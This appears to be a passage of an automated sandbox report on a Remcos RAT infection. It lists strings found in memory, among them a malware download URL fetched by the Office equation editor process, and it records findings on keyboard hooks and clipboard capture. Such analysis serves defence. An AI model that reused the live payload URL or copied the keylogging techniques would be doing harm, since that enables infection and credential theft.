                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363811273.0000000000383000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: plugman23456.scr, 00000005.00000002.378628217.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 0000000F.00000002.400864194.0000000002691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.363793468.0000000000387000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.363969598.0000000000304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scr
                  Source: EQNEDT32.EXE, 00000002.00000003.363793468.0000000000387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scrC:
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scriiC:
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scrj
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: plugman23456.scr, 00000017.00000002.387492879.00000000001FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
                  Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: plugman23456.scr, 00000015.00000002.392417743.0000000000254000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: plugman23456.scrString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: plugman23456.scr, 00000015.00000002.393286872.0000000002509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: EQNEDT32.EXE, 00000002.00000003.363803230.000000000033C000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: plugman23456.scrString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000025_2_0040A2B8
                  Installs a global keyboard hook
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\plugman23456.scrJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0041183A OpenClipboard,GetLastError,DeleteFileW,21_2_0041183A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,21_2_0040987A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_004098E2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_00406DFC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,22_2_00406E9F
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_004068B5
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,23_2_004072B5
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,25_2_004168C1
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,25_2_0040B70E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,25_2_0040A3E0

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
